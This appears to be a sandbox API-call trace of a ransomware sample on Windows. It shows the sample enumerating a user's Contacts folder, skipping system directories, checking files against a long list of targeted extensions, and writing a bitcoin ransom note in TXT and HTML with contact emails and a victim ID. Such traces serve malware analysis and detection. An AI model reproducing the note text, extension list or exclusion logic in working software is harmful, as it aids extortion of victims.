	[0181.118] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0181.119] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*") returned 34
	[0181.119] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.119] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\contacts\\*.*") returned 0x22
	[0181.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.119] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="windows") returned 0x0
	[0181.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.120] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="boot") returned 0x0
	[0181.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.120] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="system volume information") returned 0x0
	[0181.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.120] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0181.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.120] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="temp") returned 0x0
	[0181.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.121] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="program files") returned 0x0
	[0181.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.121] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="program files (x86)") returned 0x0
	[0181.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.121] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="appdata") returned 0x0
	[0181.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.121] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="application data") returned 0x0
	[0181.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.122] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="winnt") returned 0x0
	[0181.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.122] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="tmp") returned 0x0
	[0181.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.122] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="cache") returned 0x0
	[0181.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.122] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="temporary internet files") returned 0x0
	[0181.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.123] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="webcache") returned 0x0
	[0181.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.123] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="inetcache") returned 0x0
	[0181.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.123] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="nvidia") returned 0x0
	[0181.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.123] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="packages") returned 0x0
	[0181.124] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.124] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="cookies") returned 0x0
	[0181.124] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.124] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="programdata") returned 0x0
	[0181.124] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0181.124] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0181.124] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0181.125] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0181.125] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Contacts\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts\\"
	[0181.125] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini"
	[0181.125] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini") returned 42
	[0181.125] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.125] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini") returned 0x2a
	[0181.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.131] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.131] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini"
	[0181.131] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini") returned 42
	[0181.131] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.132] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0181.132] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.132] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0181.132] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0181.133] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0181.133] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0181.133] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Contacts" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts"
	[0181.133] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*"
	[0181.133] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.134] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.134] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\HELP_DECRYPT_YOUR_FILES.TXT") returned 58
	[0181.134] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.135] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0181.135] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0181.138] CloseHandle (hObject=0x380) returned 1
	[0181.138] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.138] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.138] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0181.139] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0181.140] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.140] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0181.140] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0181.140] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0181.141] CloseHandle (hObject=0x380) returned 1
	[0181.141] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.142] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.142] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0181.142] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\HELP_DECRYPT_YOUR_FILES.HTML") returned 59
	[0181.142] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.143] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0181.143] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0181.146] CloseHandle (hObject=0x380) returned 1
	[0181.146] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.147] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.147] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0181.148] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.148] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.149] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0181.149] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.149] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0181.149] CloseHandle (hObject=0x380) returned 1
	[0181.149] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8580caba, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0181.150] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*") returned 34
	[0181.150] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.150] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\contacts\\*.*") returned 0x22
	[0181.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.150] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="windows") returned 0x0
	[0181.150] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="boot") returned 0x0
